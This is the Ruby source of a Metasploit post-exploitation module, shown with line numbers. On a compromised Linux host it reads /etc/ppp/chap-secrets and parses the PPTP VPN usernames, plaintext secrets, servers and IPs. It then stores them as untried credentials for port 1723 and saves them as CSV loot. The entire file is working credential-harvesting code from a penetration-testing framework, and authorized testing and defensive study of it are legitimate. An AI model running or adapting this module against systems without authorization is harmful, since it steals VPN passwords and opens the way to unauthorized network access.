1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Linux Gather PPTP VPN chap-secrets Credentials',
15
        'Description' => %q{
16
          This module collects PPTP VPN information such as client, server, password,
17
          and IP from your target server's chap-secrets file.
18
        },
19
        'License' => MSF_LICENSE,
20
        'Author' => [ 'sinn3r'],
21
        'Platform' => [ 'linux' ],
22
        'SessionTypes' => [ 'shell', 'meterpreter' ],
23
        'Notes' => {
24
          'Stability' => [CRASH_SAFE],
25
          'SideEffects' => [],
26
          'Reliability' => []
27
        }
28
      )
29
    )
30

31
    register_options(
32
      [
33
        OptString.new('FILE', [true, 'The default path for chap-secrets', '/etc/ppp/chap-secrets'])
34
      ]
35
    )
36
  end
37

38
  #
39
  # Reads chap_secrets
40
  #
41
  def load_file(fname)
42
    begin
43
      data = read_file(fname)
44
    rescue Rex::Post::Meterpreter::RequestError => e
45
      print_error("Failed to retrieve file. #{e.message}")
46
      data = ''
47
    end
48
    fail_with(Failure::BadConfig, "The file #{fname} does not exist or is not a readable file!") unless data
49
    return data
50
  end
51

52
  def report_cred(opts)
53
    service_data = {
54
      address: opts[:ip],
55
      port: opts[:port],
56
      service_name: opts[:service_name],
57
      protocol: 'tcp',
58
      workspace_id: myworkspace_id
59
    }
60

61
    credential_data = {
62
      module_fullname: fullname,
63
      post_reference_name: refname,
64
      session_id: session_db_id,
65
      origin_type: :session,
66
      private_data: opts[:password],
67
      private_type: :password,
68
      username: opts[:user]
69
    }.merge(service_data)
70

71
    login_data = {
72
      core: create_credential(credential_data),
73
      status: Metasploit::Model::Login::Status::UNTRIED
74
    }.merge(service_data)
75

76
    create_credential_login(login_data)
77
  end
78

79
  #
80
  # Extracts client, server, secret, and IP addresses
81
  #
82
  def extract_secrets(data)
83
    tbl = Rex::Text::Table.new({
84
      'Header' => 'PPTPd chap-secrets',
85
      'Indent' => 1,
86
      'Columns' => ['Client', 'Server', 'Secret', 'IP']
87
    })
88

89
    data.each_line do |l|
90
      # If this line is commented out, ignore it
91
      next if l =~ /^[[:blank:]]*#/
92

93
      found = l.split
94

95
      # Nothing is found, skip!
96
      next if found.empty?
97

98
      client = (found[0] || '').strip
99
      server = (found[1] || '').strip
100
      secret = (found[2] || '').strip
101
      ip = (found[3, found.length] * ', ' || '').strip
102

103
      report_cred(
104
        ip: session.session_host,
105
        port: 1723, # PPTP port
106
        service_name: 'pptp',
107
        user: client,
108
        password: secret
109
      )
110

111
      tbl << [client, server, secret, ip]
112
    end
113

114
    if tbl.rows.empty?
115
      print_status("This file has no secrets: #{datastore['FILE']}")
116
    else
117
      print_line(tbl.to_s)
118

119
      p = store_loot(
120
        'linux.chapsecrets.creds',
121
        'text/csv',
122
        session,
123
        tbl.to_csv,
124
        File.basename(datastore['FILE'] + '.txt')
125
      )
126
      print_good("Secrets stored in: #{p}")
127
    end
128
  end
129

130
  def run
131
    fname = datastore['FILE']
132
    f = load_file(fname)
133
    extract_secrets(f)
134
  end
135

136
end
137

138